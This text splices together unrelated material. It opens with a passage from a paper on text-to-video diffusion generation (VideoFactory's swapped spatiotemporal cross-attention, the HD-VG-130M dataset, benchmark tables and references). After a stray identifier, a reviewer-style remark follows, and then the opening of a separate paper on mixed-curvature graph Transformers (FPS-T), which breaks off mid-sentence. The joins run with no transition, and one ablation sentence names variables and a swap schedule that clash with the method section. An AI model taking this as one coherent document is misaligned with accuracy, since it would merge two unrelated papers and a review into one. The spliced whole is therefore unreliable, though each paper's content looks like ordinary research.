The direction of cross-attention, specifically whether $Q$ originates from spatial or temporal features, plays a decisive role in determining its impact. In general, spatial features tend to encompass more contextual information, which can improve the alignment of temporal features with the input text. On the other hand, temporal features have a complete receptive field over the time series, which may enable spatial features to generate visual content more effectively. To leverage both aspects, we propose to swap the roles of $Q$ and $K, V$ between adjacent blocks. This ensures that both temporal and spatial features receive sufficient information from the other modality, enabling a comprehensive and mutually beneficial interaction.

Global attention greatly increases computational costs in terms of memory and running time. To improve efficiency, we conduct 3D window attention. Given a video feature of shape $F \times H \times W$ and a 3D window size of $F_w \times H_w \times W_w$, we organize the windows to process the feature in a non-overlapping manner, leading to $\lceil \frac{F}{F_w} \rceil \times \lceil \frac{H}{H_w} \rceil \times \lceil \frac{W}{W_w} \rceil$ distinct 3D windows. Within each window, we perform spatiotemporal cross-attention. By adopting the 3D window scheme, we effectively reduce computational costs without compromising performance.
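A minimal sketch of the non-overlapping 3D window partition, assuming a feature tensor of shape (B, F, H, W, C) already padded to multiples of the window size:

```python
import torch

def window_partition_3d(x: torch.Tensor, Fw: int, Hw: int, Ww: int) -> torch.Tensor:
    """(B, F, H, W, C) -> (B * nF*nH*nW, Fw*Hw*Ww, C) windows for attention."""
    B, F, H, W, C = x.shape
    x = x.view(B, F // Fw, Fw, H // Hw, Hw, W // Ww, Ww, C)
    x = x.permute(0, 1, 3, 5, 2, 4, 6, 7).contiguous()
    return x.view(-1, Fw * Hw * Ww, C)

# Shifted windows along time (3DSW) can be realized by rolling the feature
# before partitioning, e.g. x = torch.roll(x, shifts=-(Fw // 2), dims=1).
```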
Following prior text-to-image arts (Blattmann et al., 2023; Rombach et al., 2022), we incorporate $2\times$ down/upsampling along the spatial dimension to establish a hierarchical structure. Furthermore, research (Habibian et al., 2019; Pessoa et al., 2020) has pointed out that the temporal dimension is sensitive to compression. In light of these considerations, we do not compress the temporal dimension, and we adopt shifted windows (Liu et al., 2022) along it, which introduces an inductive bias of locality. On the spatial dimension, we do not shift, since the down/upsampling already introduces connections between neighboring non-overlapping 3D windows. To this end, we propose a Swapped spatiotemporal Cross-Attention (Swap-CA) in 3D windows. Let $s^l$ and $t^l$ represent the predictions of the 2D and 1D modules, respectively. We utilize Multi-head Cross-Attention (MCA) to compute their interactions in Swap-CA as
$$\hat{s}^l = \text{Proj}_{in}^l \circ \text{GN}(s^l), \quad \hat{t}^l = \text{Proj}_{in}^l \circ \text{GN}(t^l);$$
$$h^l = \text{3DW-MCA}(\text{LN}(\hat{s}^l), \text{LN}(\hat{t}^l)) + \hat{s}^l;$$
$$\bar{h}^l = \text{FFN} \circ \text{LN}(h^l) + h^l;$$
$$z^l = t^l + s^l + \text{Swap-CA}(s^l, t^l) = t^l + s^l + \text{Proj}_{out}^l(\bar{h}^l),$$
where GN (GroupNorm), LN (LayerNorm), the projections Proj, and 3D Window-based Multi-head Cross-Attention (3DW-MCA) are learnable modules. By initializing the output projection $\text{Proj}_{out}^l$ to zero, we have $z^l = t^l + s^l$; that is, Swap-CA is skipped and reduces to a basic addition operation. This allows us to initially train the diffusion model using addition operations, significantly speeding up the training process, and to subsequently switch to Swap-CA to enhance the model's performance. For the next spatial-temporal separable block, we apply shifted 3D window multi-head cross-attention (3DSW-MCA) and interchange the roles of $s$ and $t$:
$$h^{l+1} = \text{3DSW-MCA}(\text{LN}(\hat{t}^{l+1}), \text{LN}(\hat{s}^{l+1})) + \hat{t}^{l+1}.$$
In all 3DSW-MCA, we shift the window along the temporal dimension by $\lceil \frac{F_w}{2} \rceil$ elements.

Table 2: Ablation study on spatiotemporal interaction strategies. We report the FVD (Unterthiner et al., 2018) and CLIPSIM (Radford et al., 2021) on 1K samples from the WebVid-10M (Bain et al., 2021) validation set. Computational cost is evaluated on inputs of shape $4 \times 16 \times 32 \times 32$. Details can be found in the appendix. $S$ and $T$ denote spatial and temporal features, respectively; "swapped" alternates the query role between adjacent blocks.

| Attention Type | $Q$ | $K$, $V$ | Param. (G) | Mem. (GB) | Time (ms) | FVD ↓ | CLIPSIM ↑ |
|--------------------------|--------|----------|------------|-----------|-----------|--------|-----------|
| None (baseline) | - | - | 1.480 | 9.37 | 135.35 | 566.16 | 0.3070 |
| Global | $T$ | $S$ | 1.601 | 22.96 | 202.12 | 555.35 | 0.3091 |
| Global | $S$ | $T$ | 1.601 | 22.96 | 205.00 | 496.25 | 0.3073 |
| Global, swapped | $T{\leftrightarrow}S$ | $S{\leftrightarrow}T$ | 1.601 | 22.96 | 201.51 | 485.86 | 0.3092 |
| 3D Window | $S$ | $T$ | 1.601 | 9.83 | 150.49 | 563.12 | 0.3086 |
| 3D Window | $T$ | $S$ | 1.601 | 9.83 | 149.93 | 490.60 | 0.3076 |
| 3D Window, swapped (Swap-CA) | $T{\leftrightarrow}S$ | $S{\leftrightarrow}T$ | 1.601 | 9.83 | 148.24 | 475.09 | 0.3107 |
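The following PyTorch module is our reading of the equations above; it is a sketch rather than the released implementation, and details such as the number of normalization groups and the FFN width are assumptions. Note how zero-initializing the output projection makes the block start as the plain addition $z^l = t^l + s^l$:

```python
import torch
import torch.nn as nn

class SwapCA(nn.Module):
    def __init__(self, c, heads=8, query_is_spatial=True):
        super().__init__()
        self.query_is_spatial = query_is_spatial       # swapped in adjacent blocks
        self.gn_s, self.gn_t = nn.GroupNorm(8, c), nn.GroupNorm(8, c)  # c % 8 == 0
        self.proj_in_s, self.proj_in_t = nn.Linear(c, c), nn.Linear(c, c)
        self.ln_q, self.ln_kv, self.ln_f = nn.LayerNorm(c), nn.LayerNorm(c), nn.LayerNorm(c)
        self.mca = nn.MultiheadAttention(c, heads, batch_first=True)
        self.ffn = nn.Sequential(nn.Linear(c, 4 * c), nn.GELU(), nn.Linear(4 * c, c))
        self.proj_out = nn.Linear(c, c)
        nn.init.zeros_(self.proj_out.weight)           # Swap-CA starts as addition
        nn.init.zeros_(self.proj_out.bias)

    def forward(self, s, t):                           # (B*windows, tokens, C) each
        hs = self.proj_in_s(self.gn_s(s.transpose(1, 2)).transpose(1, 2))
        ht = self.proj_in_t(self.gn_t(t.transpose(1, 2)).transpose(1, 2))
        q, kv = (hs, ht) if self.query_is_spatial else (ht, hs)
        h = self.mca(self.ln_q(q), self.ln_kv(kv), self.ln_kv(kv))[0] + q
        h = self.ffn(self.ln_f(h)) + h
        return s + t + self.proj_out(h)                # z = t + s + Swap-CA(s, t)
```

Adjacent blocks would instantiate this module with `query_is_spatial` flipped, and the shifted-window variant (3DSW-MCA) can be realized by rolling the feature along the temporal axis before window partitioning.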
**Overall Architecture.** We adopt LDM (Rombach et al., 2022) as the text-to-image backbone. We employ an auto-encoder to compress the video into a downsampled 3D latent space, and within this latent space we perform diffusion optimization with an hourglass spatial-temporal separable U-Net. Text features are extracted with a pretrained CLIP (Radford et al., 2021) model and inserted into the U-Net through cross-attention along the spatial dimension. Our framework is illustrated in Fig. 3. To balance performance and efficiency, we use Swap-CA only at the end of each U-Net encoder and decoder block; at other positions, we employ a straightforward fusion using a $1 \times 1 \times 1$ convolution to merge spatial and temporal features. To enhance the connectivity among temporal modules, we introduce skip connections between temporal modules separated by spatial down/upsampling modules. This strategy promotes stronger integration and information flow along the temporal dimension of the network.

**Super-Resolution Towards Higher Quality.** To obtain visually satisfying results, we further perform Super-Resolution (SR) on the generated videos. One key to improving SR performance is designing a degradation model that closely resembles the actual degradation process (Wang et al., 2021). In our scenario, the generated video quality suffers from both the diffusion and auto-encoding processes. We therefore adopt the hybrid degradation model of Real-ESRGAN (Wang et al., 2021) to simulate the quality degradation introduced by the generation process. During training, an original video frame is downsampled and degraded using this model, and the SR network attempts to restore the resulting low-resolution image. We adopt RCAN (Zhang et al., 2018) with 8 residual blocks as our SR network, trained with a vanilla GAN objective (Goodfellow et al., 2014) to improve visual quality. With a suitable degradation design, our SR network can further reduce artifacts and distortion in the frames, increase their resolution, and improve their visual quality.

## 5 EXPERIMENTS

### 5.1 IMPLEMENTATION DETAILS

Our model predicts frames at a resolution of $344 \times 192$ (with a latent-space resolution of $43 \times 24$). A $4\times$ upscaling is then performed by our SR model, resulting in a final output resolution of $1376 \times 768$. Our model is trained on 32 NVIDIA V100 GPUs. We utilize our HD-VG-130M as training data to promote the visual quality of generation. Furthermore, considering that the textual captions in HD-VG-130M are annotated by BLIP-2 (Li et al., 2023), which may have some discrepancies with human expressions, we adopt a joint training strategy with WebVid-10M (Bain et al., 2021) to ensure the model generalizes well to diverse human-written textual inputs. This allows us to benefit from the large-scale text-video pairs and superior visual quality of HD-VG-130M while maintaining generalization to the diverse textual inputs of real scenarios, enhancing the overall training process. More details can be found in the appendix.
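For the super-resolution stage described above, a simplified single-pass sketch of a Real-ESRGAN-style hybrid degradation is given below; the actual pipeline applies multiple randomized rounds of blur, resizing, noise, and JPEG compression, and all parameter ranges here are illustrative:

```python
import numpy as np
import cv2

def degrade(frame: np.ndarray, scale: int = 4) -> np.ndarray:
    """frame: float32 RGB in [0, 1], shape (H, W, 3); returns a degraded LR frame."""
    h, w = frame.shape[:2]
    out = cv2.GaussianBlur(frame, (7, 7), sigmaX=float(np.random.uniform(0.2, 3.0)))
    out = cv2.resize(out, (w // scale, h // scale), interpolation=cv2.INTER_AREA)
    out = np.clip(out + np.random.normal(0, 0.02, out.shape), 0, 1)  # Gaussian noise
    quality = int(np.random.randint(30, 95))                         # JPEG artifacts
    enc = cv2.imencode(".jpg", (out * 255).astype(np.uint8),
                       [cv2.IMWRITE_JPEG_QUALITY, quality])[1]
    out = cv2.imdecode(enc, cv2.IMREAD_COLOR).astype(np.float32) / 255.0
    return out  # paired with the original frame as the SR training target
```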
### 5.2 ABLATION STUDIES

**Spatiotemporal Inter-Connection.** We first evaluate the design of our swapped cross-attention mechanism. As shown in Tab. 2, using temporal features as $Q$ generally leads to better CLIP similarity (CLIPSIM) (Radford et al., 2021), revealing better text-video alignment. The reason might be that language cross-attention exists only in the spatial modules; thus, using spatial features to guide temporal ones implicitly enhances semantic guidance. Conversely, using spatial features as $Q$ leads to significantly better FVD, revealing better video quality. The reason might be that spatial features can better perceive the overall video when using temporal features as guidance. This experiment demonstrates the benefits of introducing cross-attention, as well as the different roles of spatial and temporal features. Combining these two aspects, we propose to swap the roles of $x$ and $y$ every two blocks. In this way, both the temporal and spatial features obtain sufficient information from the other modality, leading to improved FVD and CLIPSIM scores. 3D window attention not only significantly lowers computational costs but also yields a slight performance improvement; previous studies (Li et al., 2021; Wang et al., 2022) have observed similar gains from integrating modules that enhance local information within transformer-like structures.

We compare against other attention strategies in Tab. 3. We re-implement these designs within our framework; specifically, 3D spatial-temporal WSA is realized by first adding the spatial and temporal features together and then applying 3D window self-attention. All other settings remain consistent with Tab. 2. The customized attention mechanism of the one-shot model Tune-A-Video appears less effective in the open-domain setting. While CogVideo and 3D spatial-temporal WSA surpass the baseline, they bring smaller performance improvements than our Swap-CA, showing the effectiveness of our approach. For additional subjective results and an evaluation of different window sizes, please consult Secs. E.1 and E.2 in the appendix.

**High-Definition Video Generation Dataset.** The advantages of HD-VG-130M extend beyond watermark removal. As shown in Fig. 4, training with HD-VG-130M not only eliminates watermarks but also elevates scenic beauty and enriches the level of detail, leading to a comprehensive improvement in the visual quality of the generated videos. This improvement is further reflected in a 10% decrease in FVD: 475.09 without HD-VG-130M versus 429.75 with it. We also tried using E2FGVI (Li et al., 2022) to remove the watermarks from WebVid-10M; as shown in Fig. 5, the resulting generated videos have blurry textures. Removing watermarks from WebVid-10M to produce high-quality video data is thus non-trivial, which underlines the significance of our HD-VG-130M.

We further evaluated different captioning models. We experimented with a state-of-the-art video captioning model, mPLUG-2 (Xu et al., 2023), but observed that it provides less detailed descriptions (e.g., BLIP-2 predicts "black coat" while mPLUG-2 does not, in the first row of Fig. 6) or misinterprets the scene (e.g., mistaking the dog to be inside the cage, in the second row of Fig. 6). As a result, using videos captioned with mPLUG-2, CLIPSIM decreases to 0.3046. Finally, we assessed the impact of training with HD-VILA-100M (Xue et al., 2022) instead of HD-VG-130M. As HD-VILA-100M only provides subtitles and lacks scene detection (with potentially multiple transitions per clip), significant performance degradation is observed in FVD (429.75 → 692.99) and CLIPSIM (0.3082 → 0.2671), despite joint training with WebVid. This experiment highlights the crucial role of our scene detection and video captioning procedures.

Table 3: Comparison with other attention strategies.

| Methods | FVD ↓ | CLIPSIM ↑ |
|-------------------------|--------|-----------|
| Baseline | 566.16 | 0.3070 |
| Tune-A-Video (2023) | 717.34 | 0.3084 |
| CogVideo (2022) | 534.48 | 0.3010 |
| 3D Spatial-Temporal WSA | 500.49 | 0.3072 |
| Swap-CA (Ours) | 475.09 | 0.3107 |

Table 4: Text-to-video generation on UCF101. Our VideoFactory surpasses the SoTA method (Video LDM) by 25%.
| Method | Zero-shot | FVD↓ |
|-----------------|-----------|------|
| VideoGPT | No | 2880.6 |
| MoCoGAN | No | 2886.8 |
| +StyleGAN2 | No | 1821.4 |
| MoCoGAN-HD | No | 1729.6 |
| DIGAN | No | 1630.2 |
| StyleGAN-V | No | 1431.0 |
| PVDM | No | 343.6 |
| CogVideo | Yes | 701.6 |
| MagicVideo | Yes | 699.0 |
| LVDM | Yes | 641.8 |
| ModelScope | Yes | 639.9 |
| Video LDM | Yes | 550.6 |
| Ours | Yes | 410.0 |

Table 5: Text-to-video generation on MSR-VTT.

| Method | Zero-shot | CLIPSIM↑ |
|-----------------|-----------|----------|
| GODIVA | No | 0.2402 |
| NUWA | No | 0.2439 |
| LVDM | Yes | 0.2381 |
| CogVideo | Yes | 0.2631 |
| ModelScope | Yes | 0.2795 |
| Video LDM | Yes | 0.2929 |
| Ours | Yes | **0.3005** |

Table 6: Text-to-video generation on WebVid. We beat the SoTA method by 29% in FVD.

| Method | FVD↓ | CLIPSIM↑ |
|-----------------|----------|----------|
| LVDM | 455.53 | 0.2751 |
| ModelScope | 414.11 | 0.3000 |
| Ours | **292.35** | **0.3070** |

Table 7: User preference. Each number indicates the percentage of participants who prefer our method over the compared method. We also report each model's parameter count relative to ours.

| Sample | Method | Param Ratio | Video Quality | Text-Video | Overall |
|-----------------|-------------------------|-------------|---------------|------------|---------|
| Pretrained Model| ModelScope (Luo et al., 2023) | 0.90× | 0.8875 | 0.8575 | 0.9300 |
| | LVDM (He et al., 2022b) | 0.57× | 0.9155 | 0.8555 | 0.9370 |
| Open Website | Make-A-Video (Singer et al., 2022) | 4.76× | 0.5417 | 0.4958 | 0.5417 |
| | Imagen Video (Ho et al., 2022a) | 7.97× | 0.4291 | 0.2582 | 0.3818 |

### 5.3 QUANTITATIVE AND QUALITATIVE COMPARISON

To thoroughly evaluate the generation performance of our VideoFactory, we benchmark it on three distinct datasets: WebVid-10M (Bain et al., 2021) (Val), which shares its domain with part of our training data, along with UCF101 (Soomro et al., 2012) and MSR-VTT (Xu et al., 2016) in the zero-shot setting.

**Evaluation on UCF101.** As mentioned in Sec. 3, the textual annotations in UCF101 are class labels. We first follow (Ho et al., 2022b; Singer et al., 2022) and rewrite the labels of the 101 classes into descriptive captions, and then generate 100 samples for each class. As shown in Tab. 4, the FVD of our method reaches 410.0, the best among zero-shot methods, also surpassing most of the methods that have been tuned on UCF101. The results verify that our proposed VideoFactory can generate more coherent and realistic videos.

**Evaluation on MSR-VTT.** As shown in Tab. 5, we also evaluate CLIPSIM on the widely used video generation benchmark MSR-VTT. We randomly choose one prompt per example from MSR-VTT to generate 2,990 videos in total. Although evaluated in a zero-shot setting, our method achieves the best average CLIPSIM score of 0.3005 among the compared methods, which suggests good semantic alignment between the generated videos and the input text.

**Evaluation on WebVid-10M (Val).** Referring to Tab. 6, we randomly extract 5K text-video pairs from WebVid-10M, excluded from the training data, to form a validation set and conduct evaluations on it. Our approach achieves an FVD of 292.35 and a CLIPSIM of 0.3070, outperforming existing methods and showcasing the superiority of our approach.

**Human Evaluation.** To assess our VideoFactory from a human perspective, we conducted a user study comparing it with four state-of-the-art models.
Specifically, we selected two models, ModelScope and LVDM, for which codes and pretrained models were available, and two methods, Make-A-Video and Imagen Video, which only show some samples on their websites. In each case, participants were presented with two samples generated by our method and the competitor. They were then asked to evaluate the video quality, text-video correlation, and express an overall preference. The results are summarized in Tab. 7. Additionally, we provide the parameter ratios for fair comparisons. Subjective Results. In Fig. 7, we show comparison results against Make-A-Video, Imagen Video, and Video LDM. The prompts and generated results are collected from their official project website. We also evaluate Gen-2 (Runway), a popular platform in the AIGC field. Make-A-Video only generates 1:1 videos, which limits the user experience. When compared with Imagen Video and Video LDM, our model generates the panda and golden retriever with more vivid details. Despite setting the motion intensity parameter to the maximum, Gen-2 cannot simulate the splashing motion of water. Furthermore, we showcase additional samples of our model in Fig. 8 and Sec. E.4 in the appendix. Video demos can be found in our supplementary. Due to space constraints, please refer to Sec. E.3 for failure case study. 6 CONCLUSION In this paper, we introduce VideoFactory, a high-quality open-domain video generation framework that produces watermark-free, high-definition (1376×768), widescreen (16:9) videos. We enhance spatial and temporal modeling using a novel swapped cross-attention mechanism, allowing spatial and temporal information to complement each other effectively. Additionally, we provide the HD-VG-130M dataset, featuring 130 million open-domain text-video pairs in widescreen, watermark-free, high-definition format, maximizing the potential of our model. Experimental results demonstrate that VideoFactory generates videos with superior spatial quality, temporal consistency, and alignment with text, establishing it as the new benchmark for text-to-video generation. REFERENCES Jie An, Songyang Zhang, Harry Yang, Sonal Gupta, Jia-Bin Huang, Jiebo Luo, and Xi Yin. Latent-Shift: Latent diffusion with temporal shift for efficient text-to-video generation. arXiv, 2023. Max Bain, Arsha Nagrani, Gül Varol, and Andrew Zisserman. Frozen in time: A joint video and image encoder for end-to-end retrieval. In ICCV, 2021. Yogesh Balaji, Seungjun Nah, Xun Huang, Arash Vahdat, Jiaming Song, Karsten Kreis, Miika Aittala, Timo Aila, Samuli Laine, Bryan Catanzaro, Tero Karras, and Ming-Yu Liu. eDiff-I: Text-to-image diffusion models with an ensemble of expert denoisers. arXiv, 2022. Gedas Bertasius, Heng Wang, and Lorenzo Torresani. Is space-time attention all you need for video understanding? In Marina Meila and Tong Zhang (eds.), ICML, 2021. Andreas Blattmann, Robin Rombach, Huan Ling, Tim Dockhorn, Seung Wook Kim, Sanja Fidler, and Karsten Kreis. Align your latents: High-resolution video synthesis with latent diffusion models. In CVPR, 2023. Breakthrough. PySceneDetect: Video scene cut detection and analysis tool. https://github.com/Breakthrough/PySceneDetect Prafulla Dhariwal and Alexander Nichol. Diffusion models beat GANs on image synthesis. In NeurIPS, 2021. Ming Ding, Zhuoyi Yang, Wenyi Hong, Wendi Zheng, Chang Zhou, Da Yin, Junyang Lin, Xu Zou, Zhou Shao, Hongxia Yang, and Jie Tang. CogView: Mastering text-to-image generation via transformers. In NeurIPS, 2021. 
Ming Ding, Wendi Zheng, Wenyi Hong, and Jie Tang. CogView2: Faster and better text-to-image generation via hierarchical transformers. In NeurIPS, 2022. Patrick Esser, Johnathan Chiu, Parmida Atighehchian, Jonathan Granskog, and Anastasis Germanidis. Structure and content-guided video synthesis with diffusion models. arXiv, 2023. Ian J. Goodfellow, Jean Pouget-Abadie, Mehdi Mirza, Bing Xu, David Warde-Farley, Sherjil Ozair, Aaron C. Courville, and Yoshua Bengio. Generative adversarial nets. In NeurIPS, 2014. Bohai Gu, Heng Fan, and Libo Zhang. Two birds, one stone: A unified framework for joint learning of image and video style transfers. In ICCV, 2023. AmirHossein Habibian, Ties van Rozendaal, Jakub M. Tomczak, and Taco Cohen. Video compression with rate-distortion autoencoders. In ICCV, 2019. Yingqing He, Tianyu Yang, Yong Zhang, Ying Shan, and Qifeng Chen. Latent video diffusion models for high-fidelity video generation with arbitrary lengths. arXiv, 2022a. Yingqing He, Tianyu Yang, Yong Zhang, Ying Shan, and Qifeng Chen. Latent video diffusion models for high-fidelity long video generation. arXiv, 2022b. Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. arXiv, 2022. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. NeurIPS, 33: 6840–6851, 2020. Jonathan Ho, William Chan, Chitwan Saharia, Jay Whang, Ruqi Gao, Alexey A. Gritsenko, Diederik P. Kingma, Ben Poole, Mohammad Norouzi, David J. Fleet, and Tim Salimans. Imagen Video: High definition video generation with diffusion models. arXiv, 2022a. Jonathan Ho, Tim Salimans, Alexey A. Gritsenko, William Chan, Mohammad Norouzi, and David J. Fleet. Video diffusion models. In NeurIPS, 2022b. Wenyi Hong, Ming Ding, Wendi Zheng, Xinghan Liu, and Jie Tang. CogVideo: Large-scale pretraining for text-to-video generation via transformers. arXiv, 2022.
AN5uo4ByWH
There is no significant theoretical analysis that would provide insights on specific features of FPS-T: e.g., for graphs whose sectional curvature distribution has a large variance, what would be a good constant-curvature space (or product of spaces) to discriminate them?
Curve Your Attention: Mixed-Curvature Transformers for Graph Representation Learning

Anonymous authors
Paper under double-blind review

Abstract

Real-world graphs naturally exhibit hierarchical trees and cyclic structures that are unfit for the typical Euclidean space. While there exist graph neural networks that utilize hyperbolic or spherical spaces towards embedding such structures more accurately, these methods are confined to the message-passing paradigm, making them vulnerable to side-effects such as oversmoothing and oversquashing. More recent work has proposed global attention-based graph Transformers that can alleviate such drawbacks and easily model long-range interactions, but their extensions towards non-Euclidean geometry are yet unexplored. To bridge this gap, we propose Fully Product-Stereographic Transformer, a generalization of Transformers towards operating entirely on the product of constant curvature spaces. When combined with tokenized graph Transformers, our model can learn the curvature appropriate for the input graph in an end-to-end fashion, without any additional tuning on different curvature initializations. We also provide a kernelized approach to non-Euclidean attention, which enables our model to run with computational cost linear in the number of nodes and edges while respecting the underlying geometry. Experiments on graph reconstruction and node classification demonstrate the benefits of generalizing Transformers to the non-Euclidean domain.

1 Introduction

Learning from graph-structured data is a challenging task in machine learning, with various downstream applications that involve modeling individual entities and relational interactions among them (Sen et al., 2008; Watts & Strogatz, 1998; Gleich et al., 2004). A dominant line of work consists of graph convolutional networks (GCNs) that aggregate features across graph neighbors through message-passing (Gilmer et al., 2017; Kipf & Welling, 2016; Veličković et al., 2017; Wu et al., 2019; Hamilton et al., 2017). While most GCNs learn features that lie on the typical Euclidean space with zero curvature, real-world graphs often comprise complex structures such as hierarchical trees and cycles that Euclidean space requires excessive dimensions to accurately embed (Sala et al., 2018). In response, the graph learning community has developed generalizations of GCNs to spaces with non-zero curvature such as hyperbolic, spherical, or mixed-curvature spaces with both negative and positive curvatures (Chami et al., 2019; Liu et al., 2019; Bachmann et al., 2020; Xiong et al., 2022).

Unfortunately, non-Euclidean GCNs are not immune to the harmful side-effects of message-passing such as oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020; Yang et al., 2022) and oversquashing (Topping et al., 2021; Alon & Yahav, 2020). These drawbacks make it difficult to stack GCN layers towards large depths, limiting their expressive power (Feng et al., 2022; Maron et al., 2019) as well as their predictive performance on tasks that require long-range interactions to solve (Dwivedi et al., 2022; Liu et al., 2021). To cope with such limitations, recent works have instead proposed Transformer-based graph encoders that can easily exchange information across long-range distances through global self-attention (Kim et al., 2022; Ying et al., 2021; Dwivedi & Bresson, 2020; Kreuzer et al., 2021).
However, existing graph Transformers are still confined within the Euclidean regime, and their extensions towards non-Euclidean geometry have not yet been studied. In this paper, we bridge this gap by generalizing the Transformer architecture (Vaswani et al., 2017) towards non-Euclidean spaces with learnable curvatures. Specifically, we endow each attention head with a stereographic model (Bachmann et al., 2020) that can universally represent Euclidean, hyperbolic, and spherical geometries.

Figure 1: Illustration of our proposed FPS-T architecture. Well-known constant-curvature spaces can be projected to the stereographic model, with a common chart map isomorphic to the $d$-dimensional Euclidean space. Each space can efficiently embed different types of graphs (e.g., trees in hyperbolic space, lines in Euclidean space, and cycles in spherical space). In FPS-T, each layer chooses a set of curvatures that fits the input graph by changing the sign of the curvature $\kappa$ in a differentiable manner.

We generalize each operation of the Transformer architecture to inputs on the product-stereographic model, all of which are end-to-end differentiable with respect to the curvatures, thereby allowing the model to jointly train embeddings as well as the underlying curvature. The resulting model, which we name Fully Product-Stereographic Transformer (FPS-T), takes advantage of both non-Euclidean geometry and long-range interactions. We empirically show that the learnable sectional curvature of FPS-T successfully converges to the geometry of the input graph, leading to better predictive performance and parameter efficiency in graph reconstruction and node classification compared to its Euclidean counterpart. To the best of our knowledge, our work is the first to propose a natural generalization of Transformers to mixed-curvature spaces. We summarize our core contributions as follows:

- We propose FPS-T, a generalization of Transformer towards operating entirely on the product-stereographic model with curvatures that are learnable in an end-to-end fashion.
- For graph representation learning, we integrate FPS-T with Tokenized Graph Transformer (Kim et al., 2022), and develop a kernelized approximation of non-Euclidean attention to reduce the computational cost to linear in the number of nodes and edges.
- Graph reconstruction and node classification experiments on synthetic as well as real-world graphs demonstrate the benefit of generalizing Transformers to the mixed-curvature domain.

2 RELATED WORK

**Non-Euclidean graph representations.** Non-Euclidean spaces are known to well-preserve specific types of graph structure where Euclidean space fails. In particular, non-Euclidean spaces with constant sectional curvature, e.g., hyperbolic and spherical spaces, are widely used in graph representation learning due to their tractable operations. Hyperbolic spaces are capable of efficiently embedding complex hierarchical structures in graphs (Nickel & Kiela, 2018; 2017; Ganea et al., 2018; Krioukov et al., 2010; Sala et al., 2018). Graphs with cyclic structures are well-suited for spherical spaces (Wilson et al., 2014; Grattarola et al., 2019). Riemannian manifolds with varying curvature and constant sign have also been proposed for graph encoding (Cruceru et al., 2021). However, Riemannian manifolds where the sign of the curvature is fixed are not a good choice for more complex graphs that exhibit both hierarchy and cycles.
Instead, the product of constant-curvature spaces (Gu et al., 2019), heterogeneous manifolds (Giovanni et al., 2022), and pseudo-Riemannian manifolds (Law & Stam, 2020) are found to be well-suited for learning representations of such complex graphs. Message-passing GCNs also benefit from considering a non-Euclidean representation space. Hyperbolic GCNs are known to outperform their Euclidean counterparts in various tasks on hierarchical graphs such as citation networks (Chami et al., 2019; Zhang et al., 2021; Pei et al., 2020) and molecules (Chami et al., 2019; Liu et al., 2019). DeepSphere (Defferrard et al., 2020) also adapted spherical space for GCNs, with applications such as 3D object and earth climate modeling. To take advantage of multiple spaces, Zhu et al. (2020b) proposed a hybrid architecture that fuses Euclidean and hyperbolic graph representations together. Deng et al. (2023) similarly proposed modeling interactions between three constant-curvature spaces (i.e., Euclidean, hyperbolic, and spherical). To allow smooth connections between the three constant-curvature spaces, Bachmann et al. (2020) proposed a model of constant-curvature space called the stereographic model, on which geometric operations such as distances and inner products are differentiable at all curvature values, including zero. Incorporating pseudo-Riemannian manifolds into the GCN architecture also showed promising results (Xiong et al., 2022), but its performance is sensitive to the time dimension of the manifold, which requires extensive hyperparameter tuning. Overall, GCNs achieve great predictive performance on homophilic graphs where connected nodes share the same features, but they tend to fail on heterophilic graphs, as stacking up GCN layers to capture message passing between distant nodes induces oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020) and oversquashing (Topping et al., 2021). To relieve this architectural limitation while utilizing non-Euclidean geometrical priors, we instead develop a Transformer-based graph encoder that operates on the stereographic model to learn graph representations.

**Graph Transformers.** Inspired by the huge success of Transformers in NLP and CV (Devlin et al., 2018; Brown et al., 2020; Dosovitskiy et al., 2020), various works extend Transformers to encode graphs whose edge connectivities are neither sequential nor grid-like. Graph Transformer (Dwivedi & Bresson, 2020) and Spectral Attention Network (Kreuzer et al., 2021) were the first pioneers to explore this direction by replacing the sinusoidal positional encodings widely used in NLP with Laplacian eigenvectors of the input graph. Graphormer (Ying et al., 2021) then proposed utilizing edge connectivities by using shortest-path distances as an attention bias, showing state-of-the-art performance on molecular property prediction. TokenGT (Kim et al., 2022) proposed a tokenization technique that views each graph as a sequence of nodes and edges. Unlike other methods, TokenGT allows straightforward integration of engineering techniques of pure Transformers such as linearized attention (Katharopoulos et al., 2020), while enjoying theoretical expressivity that surpasses that of message-passing GNNs (Kim et al., 2022; Maron et al., 2019). However, existing graph Transformer architectures are still confined within the Euclidean domain, making them unable to precisely embed graphs onto the feature space the way geometric GCNs can.
While Hyperbolic Attention Network (Gulcehre et al., 2018) proposed an attention mechanism that operates on hyperbolic space, its distance-based approach imposes a computational cost quadratic in the graph size, and its geometry is fixed as hyperbolic. Instead, we generalize the representation space of the Transformer to the stereographic model, which allows us to cover a wider variety of graphs. We also linearize the attention mechanism on the stereographic model similarly to Katharopoulos et al. (2020), which results in a model that runs in cost linear in the number of nodes and edges.

### 3 Preliminaries

In this section, we introduce concepts related to our main geometrical tool, the product-stereographic model (Bachmann et al., 2020). We also discuss multi-head attention, the driving force of the Transformer architecture (Vaswani et al., 2017).

#### 3.1 Product-Stereographic Model

**Riemannian manifolds.** A Riemannian manifold consists of a smooth manifold \( M \) and a metric tensor \( g \). Each point \( x \) on the manifold \( M \) defines a tangent space \( T_xM \), which is the collection of all vectors tangent to \( x \), called tangent vectors. The metric tensor \( g : M \rightarrow \mathbb{R}^{n \times n} \) assigns a positive-definite matrix to each point \( x \), which defines its inner product \( \langle \cdot , \cdot \rangle_x : T_xM \times T_xM \rightarrow \mathbb{R} \) as \( v_1^T g(x) v_2 \), where \( v_1, v_2 \in T_xM \) are tangent vectors of \( x \). The metric tensor also defines geometrical properties and operations on the Riemannian manifold. A geodesic \( \gamma \) is the shortest curve between two points \( x, y \in M \), and its length (the geodesic distance) can be computed as \( d_M(x, y) = \int_0^1 \sqrt{\langle \dot{\gamma}(t), \dot{\gamma}(t) \rangle_{\gamma(t)}}\, dt \), where \( \gamma : [0, 1] \rightarrow M \) is a unit-speed curve satisfying \( \gamma(0) = x \) and \( \gamma(1) = y \). We can move the point \( x \in M \) along a tangent vector \( v \in T_xM \) using the exponential map \( \exp_x : T_xM \rightarrow M \), which is defined as \( \exp_x(v) = \gamma(1) \) where \( \gamma \) is a geodesic with \( \gamma(0) = x \) and \( \gamma'(0) = v \). The logarithmic map \( \log_x : M \rightarrow T_xM \) is the inverse of \( \exp_x \). A tangent vector \( v \in T_xM \) can be transferred along a 